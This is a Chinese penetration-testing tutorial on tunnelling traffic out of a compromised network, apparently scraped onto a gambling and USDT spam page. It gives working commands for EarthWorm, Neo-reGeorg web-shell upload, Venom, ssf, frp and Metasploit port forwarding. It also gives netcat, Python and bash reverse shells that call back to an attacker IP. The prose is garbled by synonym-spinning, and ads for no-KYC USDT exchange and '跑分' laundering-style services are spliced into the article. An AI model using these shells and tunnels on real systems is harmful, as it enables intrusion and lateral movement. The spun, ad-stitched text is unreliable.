欢迎进入UG环球官网(环球UG)!

usdt支付对接(www.caibao.it):内网穿透的n种姿势

admin2周前10

USDT官网

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

  • 0x00 前言

在渗透中拿到一台边缘机械后剩余内网机械不出网的情形很常见,这时我们就需要把内网机械流量转到边缘机械上再举行接见,内网流量转出来的方式许多,在下面就先容几种常见的方式

  • 0x01 环境先容

内陆环境搭建:

边缘机械:

windows 7

ip:192.168.10.15(外)

 192.168.52.143(内)

目的机械:

windows 2008R2

ip:192.168.52.138

攻击机械:

windows 2008

ip:192.168.10.3

kali:

msf5:192.168.10.14

msf6:192.168.10.11

  • 0x02 EarthWorm

将ew_for_windows上传到边缘机械

1.正向毗邻

适用于目的机械拥有一个外网ip

在win7机械上执行

ew -s ssocksd -l 888

监听本机888端口。然后在2008r2机械上使用proxifier举行毗邻

2.反向毗邻

适用于边缘机械无公网ip

攻击机械上执行

ew_for_Win.exe -s rcsocks -l 1080 -e 1234

对外1234端口转发到1080端口

然后边缘机械毗邻

ew_for_Win.exe -s rssocks -d 192.168.10.3 -e 1234
  • 0x03 Neo-reGeorg

注:这里需要python环境,在2008R2上弄总是失足,切到物理机举行实验,原理相同

天生文件

python neoreg.py generate -k 123456

在neoreg_servers目录下天生了木马文件

这里web机械剖析php,以是我上传一个tunnel.php的马到web机械(win7)上

攻击机毗邻

python neoreg.py -k 123456 -u http://192.168.10.15/tunnel.php
  • 0x04 Venom

攻击机械上执行

admin.exe -lport 9999

边缘机械(win7)执行

agent.exe -rhost 192.168.10.3 -rport 9999

攻击机查看反弹乐成

执行下令

goto 1
socks 6666
  • 0x05 ssf

1.正向毗邻

把certs文件夹和ssfd上传到边缘机械

边缘机械开启1333端口

,

USDT场外交易网

U交所(www.payusdt.vip)是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U交所开放usdt otc API接口、支付回调等接口。

,
ssfd.exe ‐p 1333

攻击机毗邻边缘机械的1333端口,并将数据转发给1222端口

ssfd.exe ‐D 1222 ‐p 1333 192.168.10.15

2008r2出问题,换到物理机上执行

2.反向毗邻

攻击机内陆监听1234端口,下令如下:

ssfd.exe ‐p 1234

边缘机械毗邻1234端口,并将数据转发到12345端口,下令如下:

ssf.exe ‐F 12345 ‐p 1234 192.168.10.3

此处没有实验乐成,照样写下步骤

内陆socks署理毗邻127.0.0.1 12345端口

  • 0x06 frp

攻击机设置frps.ini

[common]
bind_port = 6666

运行如下下令:

frps.exe -c frps.ini

在边缘机械设置frpc.ini

[common]
server_addr = 192.168.10.3
server_port = 6666
[http_proxy]
type=tcp
remote_port=7777
plugin=socks5

执行如下下令:

frpc.exe ‐c frpc.ini

监听内陆7777端口

0x07 msf

在msf6下只剩下了socks_proxy这个模块

照样先修改proxychains4.conf这个设置文件

添加路由使用模块

这里注重一下,我们在运行之前先show options一下,发现默认是socks5署理运行

若是想使用socks4a署理,添加如下语句即可

set version 4a

修改浏览器设置

乐成接见内网资源

拓展:portfwd端口转发

portfwd 是meterpreter提供的一种基本的端口转发。porfwd可以反弹单个端口到内陆,而且监听,使用方式如下

portfwd add -l 3389 -r 192.168.52.138 -p 3389

然后我们接见内陆3389

  • 0x08 nc

1.正向毗邻

需要目的有公网ip

目的机械

nc -lvp 4444 -e /bin/sh linux
nc -lvp 4444 -e c:\windows\system32\cmd.exe windows

攻击机械

nc <目的机械ip> 4444

2.反向毗邻

攻击机械监听内陆1234端口

nc -lvp 1234

目的机械执行

nc <ip> 1234 -e /bin/sh linux
nc <ip> 1234 -e cmd.exe windows

在一样平常情形下目的机械是没有nc的,这里可以用其他工具或者编程语言来取代nc

python反向shell

攻击机械:

nc -lvp 2222

目的机械:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.10.3',2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

bash反向shell

攻击机械:

nc -lvp 2222

目的机械:

bash -i >& /dev/tcp/192.168.10.3/2222 0>&1
上一篇 下一篇

猜你喜欢

网友评论

  • 2021-05-03 00:06:25

    妙药善于位置从辅助、ad到上单、打野,无一不精。很显然他已经成为OMG战队的焦点选手,人送外号药导,但粉丝喜欢称谓他为腹黑智囊、护国螳螂、节奏大狮等等。只管奖项拿到手软,但他照样毅然决然地在2015年选择退役。在退隐这段时间虽然人不在江湖,但江湖仍有他的传说,人人本以为他的时代已经已往之时,在2021年妙药带着自己的战队泛起了好久没看了

随机文章
热门文章
热评文章
热门标签